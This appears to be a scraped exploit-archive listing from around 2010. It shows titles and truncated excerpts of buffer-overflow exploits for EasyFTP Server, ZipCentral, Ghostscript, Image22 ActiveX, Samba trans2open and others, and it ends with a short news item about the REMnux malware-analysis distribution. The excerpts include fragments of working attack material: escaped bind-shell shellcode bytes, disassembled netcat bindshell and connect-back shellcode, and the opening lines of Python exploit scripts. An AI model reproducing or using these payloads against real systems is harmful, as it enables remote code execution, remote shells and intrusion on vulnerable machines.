ZipCentral - .zip Local Buffer Overflow (SEH)

ZipCentral - .zip Local Buffer Overflow SEH Author : Jiten Pathy July 21 2010 Thanks to the http://en.wikipedia.org/wiki/PKZIP page for heelping me understand zip file format Thanks to corelanc0d3r for shredding light on these type of exploits at...

EasyFTP Server 1.7.0.11 - CWD (Authenticated) Remote Buffer Overflow

EasyFTP Server 1.7.0.11 - CWD Authenticated Remote Buffer Overflow Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit Post Auth Date: 2010-07-18 Author: @fdiskyou e-mail: rui at deniable.org Software Link: Version: 1.7.0.11 Tested on: Windows XP SP3 en import sock...

Ghostscript - '.PostScript' File Stack Overflow

Check Point Software Technologies - Vulnerability Discovery Team VDT Rodrigo Rubira Branco - GhostScript Stack Overflow bsd/x86/shellbindtcp - 214 bytes http://www.metasploit.com Encoder: x86/alphaupper AppendExit=false, PrependSetresuid=false, PrependSetuid=false, LPORT=4444, RHOST=,...

Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit

Exploit for windows platform in category remote exploits ================================================================================= Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit Post Auth...

Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit

Exploit for windows platform in category remote exploits ================================================================================ Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit Post Auth ================================================================================...

EasyFTP Server 1.7.0.11 - 'MKD' (Authenticated) Remote Buffer Overflow

!/usr/bin/python import socket,sys Tested on XP Pro SP2 Eng and XP Pro SP3 Eng print """ Easy FTP Server v1.7.0.11 MKD Remote BoF Exploit Post Authentication Author / Discovered by : Karn Ganeshen Date : July 5, 2010 KarnGaneshen aT gmail d0t com http://ipositivesecurity.blogspot.com """ if...

Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow

Exploit for windows platform in category local exploits ============================================================================ Mini-Stream RM-MP3 Converter v3.1.2.1 .pls Stack Buffer Overflow universal ============================================================================ Mini-Stream...

linux/x86 standard system beep polymorphic shellcode 87 bytes

Exploit for linux/x86 platform in category shellcode ============================================================= linux/x86 standard system beep polymorphic shellcode 87 bytes ============================================================= /...

FathFTP ActiveX控件GetFromURL和RasIsConnected调用栈溢出漏洞

CVE ID: CVE-2010-2701 FathFTP是Windows开发人员可使用的FTP客户端和FTP服务器ActiveX/COM组件。 FathFTP ActiveX控件没有正确地验证提交给GetFromURL或RasIsConnected方式的输入参数，用户受骗访问了恶意网页并向上述方式传送了超长参数就可以触发栈溢出，导致执行任意代码。 FathFTP ActiveX 1.7 临时解决方法： 为clsid 62A989CE-D39A-11D5-86F0-B9C370762176设置kill bit。 厂商补丁： Fath Software -------------...

Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)

$Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

Image22 1.1.1 Buffer Overflow

' 988 bytes for shellcode ' bind shell port 4444 sc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...

linux/x86 netcat connect back port 8080 76 bytes

Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 netcat connect back port 8080 76 bytes ================================================ / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor...

linux/x86 netcat bindshell port 8080 75 bytes

Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 netcat bindshell port 8080 75 bytes ============================================= / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax...

Linux x86 netcat bindshell port 8080 - 75 bytes

Linux x86 netcat bindshell port 8080 - 75 bytes. Shellcode exploit for linux platform / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 0f mov %al,0xf%esi 804806b: 88 46 19 mov %al,0x19%esi 804806e...

Linux x86 netcat connect back port 8080 - 76 bytes

Linux x86 netcat connect back port 8080 - 76 bytes. Shellcode exploit for linx86 platform / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 15 mov %al,0x15%esi 804806b: 88 46 1a mov %al,0x1a%esi...

RSP MP3 Player OCX 3.2 Buffer Overflow

' Exploit Title: RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow ' Date: July 9, 2010 ' Author: Blake ' Software Link: http://download.cnet.com/RSP-MP3-Player-OCX/3000-22064-10860503.html?tag=mncol ' Version: 3.2 ' Tested on: Windows XP SP3 / IE7 in VirtualBox ' EXITFUNC=seh CMD=calc.exe Size=338...

Image22 ActiveX 1.1.1 - Remote Buffer Overflow

Image22 ActiveX 1.1.1 - Remote Buffer Overflow ' 988 bytes for shellcode ' bind shell port 4444 sc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" &...

Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)

Windows/x86 XP SP3 English - calc.exe Shellcode 16 bytes. Shellcode exploit for Windowsx86 platform. Tags: Metasploit Framework MSF /------------------------------------------------------------------------ Title...................Windows XP SP3 EN Calc Shellcode 16 Bytes Release...

Image22 ActiveX 1.1.1 - Remote Buffer Overflow

' 988 bytes for shellcode ' bind shell port 4444 sc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...

New Linux OS REMnux Designed For Reverse Engineering Malware

A security expert has released a stripped-down Ubuntu distribution designed specifically for reverse-engineering malware. The OS, called REMnux, includes a slew of popular malware-analysis, network monitoring and memory forensics tools the comprise a very powerful environment for taking apart...